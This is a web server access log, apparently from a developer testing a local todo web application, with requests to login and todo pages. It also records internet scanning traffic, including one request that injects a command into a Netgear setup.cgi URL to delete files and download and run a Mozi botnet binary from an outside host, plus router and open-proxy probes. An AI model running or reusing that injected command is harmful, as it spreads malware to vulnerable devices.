0:0:0:0:0:0:0:1 - - [28/Oct/2022:10:36:26 +0300] "GET / HTTP/1.1" 404 949 http-bio-8080-exec-1 24
0:0:0:0:0:0:0:1 - - [28/Oct/2022:10:36:26 +0300] "GET /favicon.ico HTTP/1.1" 404 949 http-bio-8080-exec-3 1
0:0:0:0:0:0:0:1 - - [28/Oct/2022:10:36:31 +0300] "GET /login HTTP/1.1" 200 302 http-bio-8080-exec-4 47
0:0:0:0:0:0:0:1 - - [28/Oct/2022:10:36:37 +0300] "POST /login HTTP/1.1" 200 154 http-bio-8080-exec-5 28
0:0:0:0:0:0:0:1 - - [28/Oct/2022:10:36:39 +0300] "GET /list-todos HTTP/1.1" 200 945 http-bio-8080-exec-6 405
0:0:0:0:0:0:0:1 - - [28/Oct/2022:10:36:43 +0300] "GET /add-todo HTTP/1.1" 200 198 http-bio-8080-exec-7 14
0:0:0:0:0:0:0:1 - - [28/Oct/2022:10:38:02 +0300] "GET /list-todos HTTP/1.1" 200 959 http-bio-8080-exec-9 51
0:0:0:0:0:0:0:1 - - [28/Oct/2022:10:38:22 +0300] "GET /list-todos HTTP/1.1" 200 973 http-bio-8080-exec-9 46
0:0:0:0:0:0:0:1 - - [28/Oct/2022:10:39:37 +0300] "GET /list-todos HTTP/1.1" 200 1005 http-bio-8080-exec-4 44
0:0:0:0:0:0:0:1 - - [28/Oct/2022:10:39:57 +0300] "GET /list-todos HTTP/1.1" 200 1017 http-bio-8080-exec-4 48
0:0:0:0:0:0:0:1 - - [28/Oct/2022:10:50:28 +0300] "GET /list-todos HTTP/1.1" 200 1287 http-bio-8080-exec-8 42
0:0:0:0:0:0:0:1 - - [28/Oct/2022:10:50:59 +0300] "GET /list-todos HTTP/1.1" 200 1356 http-bio-8080-exec-8 41
0:0:0:0:0:0:0:1 - - [28/Oct/2022:10:54:08 +0300] "GET /list-todos HTTP/1.1" 200 1416 http-bio-8080-exec-9 39
0:0:0:0:0:0:0:1 - - [28/Oct/2022:10:54:10 +0300] "GET /delete-todo HTTP/1.1" 404 949 http-bio-8080-exec-9 1
0:0:0:0:0:0:0:1 - - [28/Oct/2022:10:54:11 +0300] "GET /list-todos HTTP/1.1" 200 1416 http-bio-8080-exec-9 2
0:0:0:0:0:0:0:1 - - [28/Oct/2022:10:57:55 +0300] "GET /list-todos HTTP/1.1" 200 1416 http-bio-8080-exec-2 2
0:0:0:0:0:0:0:1 - - [28/Oct/2022:10:57:57 +0300] "GET /delete-todo HTTP/1.1" 404 949 http-bio-8080-exec-2 1
0:0:0:0:0:0:0:1 - - [28/Oct/2022:10:57:58 +0300] "GET /list-todos HTTP/1.1" 200 1416 http-bio-8080-exec-2 2
0:0:0:0:0:0:0:1 - - [28/Oct/2022:10:58:10 +0300] "GET /list-todos HTTP/1.1" 200 1416 http-bio-8080-exec-1 65
0:0:0:0:0:0:0:1 - - [28/Oct/2022:10:58:11 +0300] "GET /delete-todo HTTP/1.1" 400 1062 http-bio-8080-exec-3 15
0:0:0:0:0:0:0:1 - - [28/Oct/2022:10:58:53 +0300] "GET /delete-todo HTTP/1.1" 302 - http-bio-8080-exec-1 34
0:0:0:0:0:0:0:1 - - [28/Oct/2022:10:58:53 +0300] "GET /list-todos?name=in28Minutes HTTP/1.1" 200 1416 http-bio-8080-exec-3 37
0:0:0:0:0:0:0:1 - - [28/Oct/2022:10:58:55 +0300] "GET /delete-todo HTTP/1.1" 302 - http-bio-8080-exec-4 2
0:0:0:0:0:0:0:1 - - [28/Oct/2022:10:58:55 +0300] "GET /list-todos?name=in28Minutes HTTP/1.1" 200 1416 http-bio-8080-exec-5 1
0:0:0:0:0:0:0:1 - - [28/Oct/2022:10:58:56 +0300] "GET /delete-todo HTTP/1.1" 302 - http-bio-8080-exec-6 1
0:0:0:0:0:0:0:1 - - [28/Oct/2022:10:58:56 +0300] "GET /list-todos?name=in28Minutes HTTP/1.1" 200 1416 http-bio-8080-exec-7 1
0:0:0:0:0:0:0:1 - - [28/Oct/2022:11:01:56 +0300] "GET /list-todos?name=in28Minutes HTTP/1.1" 200 1458 http-bio-8080-exec-1 438
0:0:0:0:0:0:0:1 - - [28/Oct/2022:11:02:00 +0300] "GET /add-todo HTTP/1.1" 200 198 http-bio-8080-exec-3 3
0:0:0:0:0:0:0:1 - - [28/Oct/2022:11:02:02 +0300] "POST /add-todo HTTP/1.1" 302 - http-bio-8080-exec-4 11
0:0:0:0:0:0:0:1 - - [28/Oct/2022:11:02:02 +0300] "GET /list-todos HTTP/1.1" 200 1701 http-bio-8080-exec-5 2
0:0:0:0:0:0:0:1 - - [28/Oct/2022:11:02:03 +0300] "GET /delete-todo?id=$[todo.id} HTTP/1.1" 400 968 http-bio-8080-exec-6 6
0:0:0:0:0:0:0:1 - - [28/Oct/2022:11:04:26 +0300] "GET /list-todos HTTP/1.1" 200 1701 http-bio-8080-exec-7 3
0:0:0:0:0:0:0:1 - - [28/Oct/2022:11:04:29 +0300] "GET /list-todos HTTP/1.1" 200 1701 http-bio-8080-exec-9 3
0:0:0:0:0:0:0:1 - - [28/Oct/2022:11:04:30 +0300] "GET /delete-todo?id=$[todo.id} HTTP/1.1" 400 968 http-bio-8080-exec-10 3
0:0:0:0:0:0:0:1 - - [28/Oct/2022:11:04:44 +0300] "GET /list-todos HTTP/1.1" 200 1701 http-bio-8080-exec-8 3
0:0:0:0:0:0:0:1 - - [28/Oct/2022:11:11:06 +0300] "GET /add-todo HTTP/1.1" 200 301 http-bio-8080-exec-4 36
0:0:0:0:0:0:0:1 - - [28/Oct/2022:11:11:48 +0300] "GET /add-todo HTTP/1.1" 200 341 http-bio-8080-exec-4 34
0:0:0:0:0:0:0:1 - - [28/Oct/2022:11:12:43 +0300] "GET /add-todo HTTP/1.1" 200 418 http-bio-8080-exec-4 33
0:0:0:0:0:0:0:1 - - [28/Oct/2022:11:14:14 +0300] "GET /add-todo HTTP/1.1" 200 641 http-bio-8080-exec-10 34
0:0:0:0:0:0:0:1 - - [28/Oct/2022:11:15:07 +0300] "GET /add-todo HTTP/1.1" 200 665 http-bio-8080-exec-10 33
0:0:0:0:0:0:0:1 - - [28/Oct/2022:11:21:49 +0300] "POST /add-todo HTTP/1.1" 302 - http-bio-8080-exec-6 2
0:0:0:0:0:0:0:1 - - [28/Oct/2022:11:21:49 +0300] "GET /list-todos HTTP/1.1" 200 1931 http-bio-8080-exec-6 2
0:0:0:0:0:0:0:1 - - [28/Oct/2022:11:23:55 +0300] "GET /add-todo HTTP/1.1" 200 583 http-bio-8080-exec-7 33
0:0:0:0:0:0:0:1 - - [28/Oct/2022:11:24:00 +0300] "POST /add-todo HTTP/1.1" 302 - http-bio-8080-exec-7 1
0:0:0:0:0:0:0:1 - - [28/Oct/2022:11:24:00 +0300] "GET /list-todos HTTP/1.1" 200 2174 http-bio-8080-exec-7 2
0:0:0:0:0:0:0:1 - - [28/Oct/2022:11:24:02 +0300] "GET /delete-todo?id=$[todo.id} HTTP/1.1" 400 968 http-bio-8080-exec-7 2
0:0:0:0:0:0:0:1 - - [28/Oct/2022:11:24:21 +0300] "GET /delete-todo?id=$[todo.id} HTTP/1.1" 400 968 http-bio-8080-exec-4 2
0:0:0:0:0:0:0:1 - - [28/Oct/2022:11:24:23 +0300] "GET /list-todos HTTP/1.1" 200 2062 http-bio-8080-exec-10 44
0:0:0:0:0:0:0:1 - - [28/Oct/2022:11:24:24 +0300] "GET /delete-todo?id=5 HTTP/1.1" 302 - http-bio-8080-exec-10 2
0:0:0:0:0:0:0:1 - - [28/Oct/2022:11:24:24 +0300] "GET /list-todos HTTP/1.1" 200 1839 http-bio-8080-exec-10 2
0:0:0:0:0:0:0:1 - - [28/Oct/2022:11:24:26 +0300] "GET /add-todo HTTP/1.1" 200 583 http-bio-8080-exec-10 2
0:0:0:0:0:0:0:1 - - [28/Oct/2022:11:24:28 +0300] "POST /add-todo HTTP/1.1" 302 - http-bio-8080-exec-10 2
0:0:0:0:0:0:0:1 - - [28/Oct/2022:11:24:28 +0300] "GET /list-todos HTTP/1.1" 200 2075 http-bio-8080-exec-10 2
0:0:0:0:0:0:0:1 - - [28/Oct/2022:11:24:30 +0300] "GET /delete-todo?id=7 HTTP/1.1" 302 - http-bio-8080-exec-10 1
0:0:0:0:0:0:0:1 - - [28/Oct/2022:11:24:30 +0300] "GET /list-todos HTTP/1.1" 200 1839 http-bio-8080-exec-10 2
195.13.161.88 - - [28/Oct/2022:11:45:35 +0300] "GET / HTTP/1.1" 404 949 http-bio-8080-exec-2 1
167.94.138.60 - - [28/Oct/2022:12:05:14 +0300] "GET / HTTP/1.1" 404 949 http-bio-8080-exec-1 1
167.94.138.60 - - [28/Oct/2022:12:05:14 +0300] "GET / HTTP/1.1" 404 949 http-bio-8080-exec-3 1
167.94.138.60 - - [28/Oct/2022:12:05:14 +0300] "PRI * HTTP/2.0" 505 - null 0
163.204.210.7 - - [28/Oct/2022:12:10:46 +0300] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 949 http-bio-8080-exec-5 1
125.42.220.65 - - [28/Oct/2022:12:11:31 +0300] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://125.42.220.65:48785/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 949 http-bio-8080-exec-10 1
193.142.146.35 - - [28/Oct/2022:12:50:28 +0300] "CONNECT google.com:443 HTTP/1.1" 400 - http-bio-8080-exec-9 0
0:0:0:0:0:0:0:1 - - [28/Oct/2022:12:51:39 +0300] "GET /list-todos HTTP/1.1" 200 1828 http-bio-8080-exec-2 4
0:0:0:0:0:0:0:1 - - [28/Oct/2022:12:53:08 +0300] "GET /list-todos HTTP/1.1" 200 1828 http-bio-8080-exec-1 2
0:0:0:0:0:0:0:1 - - [28/Oct/2022:12:55:58 +0300] "GET /list-todos HTTP/1.1" 200 1828 http-bio-8080-exec-4 3
0:0:0:0:0:0:0:1 - - [28/Oct/2022:12:56:00 +0300] "GET /add-todo HTTP/1.1" 500 4079 http-bio-8080-exec-4 14
0:0:0:0:0:0:0:1 - - [28/Oct/2022:12:58:50 +0300] "GET /add-todo HTTP/1.1" 500 4079 http-bio-8080-exec-9 10
0:0:0:0:0:0:0:1 - - [28/Oct/2022:12:59:25 +0300] "GET /add-todo HTTP/1.1" 500 4079 http-bio-8080-exec-1 148
0:0:0:0:0:0:0:1 - - [28/Oct/2022:12:59:31 +0300] "GET / HTTP/1.1" 404 949 http-bio-8080-exec-2 2
0:0:0:0:0:0:0:1 - - [28/Oct/2022:12:59:41 +0300] "GET /login HTTP/1.1" 200 302 http-bio-8080-exec-4 26
0:0:0:0:0:0:0:1 - - [28/Oct/2022:12:59:43 +0300] "GET /login HTTP/1.1" 200 302 http-bio-8080-exec-5 2
0:0:0:0:0:0:0:1 - - [28/Oct/2022:12:59:47 +0300] "POST /login HTTP/1.1" 200 154 http-bio-8080-exec-6 14
0:0:0:0:0:0:0:1 - - [28/Oct/2022:12:59:49 +0300] "GET /list-todos HTTP/1.1" 200 1367 http-bio-8080-exec-7 11
0:0:0:0:0:0:0:1 - - [28/Oct/2022:12:59:50 +0300] "GET /add-todo HTTP/1.1" 500 4079 http-bio-8080-exec-8 10
0:0:0:0:0:0:0:1 - - [28/Oct/2022:13:00:33 +0300] "GET /add-todo HTTP/1.1" 200 630 http-bio-8080-exec-9 274
193.142.146.35 - - [28/Oct/2022:13:38:06 +0300] "CONNECT google.com:443 HTTP/1.1" 400 - http-bio-8080-exec-2 0
0:0:0:0:0:0:0:1 - - [28/Oct/2022:14:33:35 +0300] "GET /add-todo HTTP/1.1" 500 12262 http-bio-8080-exec-1 77
0:0:0:0:0:0:0:1 - - [28/Oct/2022:14:33:39 +0300] "GET /login HTTP/1.1" 500 12262 http-bio-8080-exec-2 54
0:0:0:0:0:0:0:1 - - [28/Oct/2022:14:33:46 +0300] "GET /login HTTP/1.1" 500 12262 http-bio-8080-exec-3 45
0:0:0:0:0:0:0:1 - - [28/Oct/2022:14:34:31 +0300] "GET /login HTTP/1.1" 500 12262 http-bio-8080-exec-1 74
0:0:0:0:0:0:0:1 - - [28/Oct/2022:14:34:42 +0300] "GET /list-todos HTTP/1.1" 500 12262 http-bio-8080-exec-2 52
0:0:0:0:0:0:0:1 - - [28/Oct/2022:14:43:19 +0300] "GET /list-todos HTTP/1.1" 500 12262 http-bio-8080-exec-1 70
0:0:0:0:0:0:0:1 - - [28/Oct/2022:14:43:22 +0300] "GET /login HTTP/1.1" 500 12262 http-bio-8080-exec-2 47
90.151.171.106 - - [28/Oct/2022:14:44:10 +0300] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 - http-bio-8080-exec-5 0
90.151.171.106 - - [28/Oct/2022:14:44:21 +0300] "GET /ip.php?Z75921414131Q1 HTTP/1.1" 500 12262 http-bio-8080-exec-7 38
0:0:0:0:0:0:0:1 - - [28/Oct/2022:14:48:28 +0300] "GET /login HTTP/1.1" 200 286 http-bio-8080-exec-1 346
0:0:0:0:0:0:0:1 - - [28/Oct/2022:14:48:34 +0300] "POST /login HTTP/1.1" 200 186 http-bio-8080-exec-3 47
0:0:0:0:0:0:0:1 - - [28/Oct/2022:14:48:39 +0300] "GET /list-todos HTTP/1.1" 200 1367 http-bio-8080-exec-4 119
0:0:0:0:0:0:0:1 - - [28/Oct/2022:14:48:41 +0300] "GET /add-todo HTTP/1.1" 500 6784 http-bio-8080-exec-5 11
0:0:0:0:0:0:0:1 - - [28/Oct/2022:15:06:17 +0300] "GET /list-todos HTTP/1.1" 200 1640 http-bio-8080-exec-6 54
0:0:0:0:0:0:0:1 - - [28/Oct/2022:15:06:19 +0300] "GET /list-todos HTTP/1.1" 200 1640 http-bio-8080-exec-8 1
0:0:0:0:0:0:0:1 - - [28/Oct/2022:15:06:21 +0300] "GET /update-todo?id=3 HTTP/1.1" 404 949 http-bio-8080-exec-9 2
0:0:0:0:0:0:0:1 - - [28/Oct/2022:15:06:22 +0300] "GET /list-todos HTTP/1.1" 200 1640 http-bio-8080-exec-10 1
0:0:0:0:0:0:0:1 - - [28/Oct/2022:15:06:23 +0300] "GET /add-todo HTTP/1.1" 500 6784 http-bio-8080-exec-10 5
0:0:0:0:0:0:0:1 - - [28/Oct/2022:15:06:24 +0300] "GET /list-todos HTTP/1.1" 200 1640 http-bio-8080-exec-7 2
0:0:0:0:0:0:0:1 - - [28/Oct/2022:15:09:16 +0300] "GET /list-todos HTTP/1.1" 200 1640 http-bio-8080-exec-1 65
0:0:0:0:0:0:0:1 - - [28/Oct/2022:15:09:18 +0300] "GET /update-todo?id=1 HTTP/1.1" 500 6784 http-bio-8080-exec-3 15
0:0:0:0:0:0:0:1 - - [28/Oct/2022:15:09:19 +0300] "GET /list-todos HTTP/1.1" 200 1640 http-bio-8080-exec-2 2
0:0:0:0:0:0:0:1 - - [28/Oct/2022:15:10:01 +0300] "GET /list-todos HTTP/1.1" 200 1640 http-bio-8080-exec-5 2
0:0:0:0:0:0:0:1 - - [28/Oct/2022:15:10:02 +0300] "GET /add-todo HTTP/1.1" 500 6784 http-bio-8080-exec-6 5
0:0:0:0:0:0:0:1 - - [28/Oct/2022:15:10:03 +0300] "GET /list-todos HTTP/1.1" 200 1640 http-bio-8080-exec-4 2
0:0:0:0:0:0:0:1 - - [28/Oct/2022:15:10:05 +0300] "GET /delete-todo?id=3 HTTP/1.1" 302 - http-bio-8080-exec-8 3
0:0:0:0:0:0:0:1 - - [28/Oct/2022:15:10:05 +0300] "GET /list-todos?name=in28Minutes HTTP/1.1" 200 1311 http-bio-8080-exec-9 1
0:0:0:0:0:0:0:1 - - [28/Oct/2022:15:10:06 +0300] "GET /update-todo?id=2 HTTP/1.1" 500 6784 http-bio-8080-exec-10 3
0:0:0:0:0:0:0:1 - - [28/Oct/2022:15:10:08 +0300] "GET /list-todos?name=in28Minutes HTTP/1.1" 200 1311 http-bio-8080-exec-7 2
0:0:0:0:0:0:0:1 - - [28/Oct/2022:15:12:55 +0300] "GET /list-todos?name=in28Minutes HTTP/1.1" 500 12262 http-bio-8080-exec-2 70
0:0:0:0:0:0:0:1 - - [28/Oct/2022:15:13:00 +0300] "GET /list-todos HTTP/1.1" 500 12262 http-bio-8080-exec-3 47
0:0:0:0:0:0:0:1 - - [28/Oct/2022:15:13:03 +0300] "GET /login HTTP/1.1" 500 12262 http-bio-8080-exec-4 44
89.248.165.52 - - [28/Oct/2022:15:13:19 +0300] "CONNECT hotmail-com.olc.protection.outlook.com:25 HTTP/1.1" 400 - http-bio-8080-exec-7 0
0:0:0:0:0:0:0:1 - - [28/Oct/2022:15:21:23 +0300] "GET /login HTTP/1.1" 500 12262 http-bio-8080-exec-1 71
0:0:0:0:0:0:0:1 - - [28/Oct/2022:15:22:37 +0300] "GET /login HTTP/1.1" 500 12262 http-bio-8080-exec-1 74
0:0:0:0:0:0:0:1 - - [28/Oct/2022:15:33:18 +0300] "GET /login HTTP/1.1" 500 12262 http-bio-8080-exec-1 68
0:0:0:0:0:0:0:1 - - [28/Oct/2022:15:33:25 +0300] "GET /todo HTTP/1.1" 500 12262 http-bio-8080-exec-2 48
0:0:0:0:0:0:0:1 - - [28/Oct/2022:15:39:08 +0300] "GET /todo HTTP/1.1" 500 12262 http-bio-8080-exec-4 37
0:0:0:0:0:0:0:1 - - [28/Oct/2022:15:39:13 +0300] "GET /login HTTP/1.1" 500 12262 http-bio-8080-exec-5 38
0:0:0:0:0:0:0:1 - - [28/Oct/2022:21:58:00 +0300] "GET /login HTTP/1.1" 500 12262 http-bio-8080-exec-1 67
0:0:0:0:0:0:0:1 - - [28/Oct/2022:21:58:00 +0300] "GET /favicon.ico HTTP/1.1" 500 12262 http-bio-8080-exec-2 46
0:0:0:0:0:0:0:1 - - [28/Oct/2022:21:58:04 +0300] "GET /todo HTTP/1.1" 500 12262 http-bio-8080-exec-3 44
0:0:0:0:0:0:0:1 - - [28/Oct/2022:21:58:04 +0300] "GET /favicon.ico HTTP/1.1" 500 12262 http-bio-8080-exec-4 41
0:0:0:0:0:0:0:1 - - [28/Oct/2022:22:00:03 +0300] "GET /list-todos HTTP/1.1" 500 12262 http-bio-8080-exec-5 37
0:0:0:0:0:0:0:1 - - [28/Oct/2022:22:00:03 +0300] "GET /favicon.ico HTTP/1.1" 500 12262 http-bio-8080-exec-6 42
192.241.194.97 - - [01/Jan/1970:02:59:59 +0300] "-" 400 - null 0
0:0:0:0:0:0:0:1 - - [28/Oct/2022:22:13:57 +0300] "GET /list-todos HTTP/1.1" 500 12262 http-bio-8080-exec-1 75
0:0:0:0:0:0:0:1 - - [28/Oct/2022:22:13:57 +0300] "GET /favicon.ico HTTP/1.1" 500 12262 http-bio-8080-exec-2 42
